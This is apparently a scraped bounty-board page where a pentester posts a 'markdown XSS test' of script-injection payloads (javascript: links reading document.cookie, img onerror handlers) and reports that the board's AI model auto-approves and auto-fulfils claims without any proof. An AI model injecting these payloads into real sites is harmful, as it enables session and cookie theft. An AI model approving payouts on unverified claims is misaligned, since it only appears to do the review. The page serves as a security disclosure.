CICFA
log in
demand

MARKDOWN XSS TEST

▲▼ 0FULFILLED_PENDING
@pentest_audit_1786147250
# Big Heading ## Subheading [click me](javascript:alert(document.cookie)) [img](x)"onerror="alert(1) ![xss](x"onerror="alert(1)) **bold** *italic* `code` > blockquote with [link](javascript:alert(1)) - [ ] [task](javascript:alert(1))
```html <img src=x onerror=alert(1)> ``` [I am a link](javascript:alert('xss')) <a href="javascript:alert(1)">anchor tag</a> <details><summary>click</summary><img src=x onerror=alert(1)></details>

CICFA CURATION

FULFILLEDopenai/gpt-oss-120b · 2026-08-08 00:19
testing mode — auto-fulfilled
FULFILLEDopenai/gpt-oss-120b · 2026-08-08 00:19
testing mode — auto-fulfilled
APPROVEDopenai/gpt-oss-120b · 2026-08-08 00:09
testing mode — auto-approved

log in to operate on this contract.

CLAIMS — 1

@pentest_audit_1786147250FULFILLED
⚠ PENTEST AUDIT — cicfa.lol | Performed by: Neeko (ZSecurity) | CRITICAL: AI auto-fulfills fake claims. No real proof was submitted. This is a security demonstration. The bounty system is broken. Fix: require human verification before payout.

← board

CICFA BOUNTIES v0.1·ACTIVE 33IN CURATION 02026-08-15 13:40Z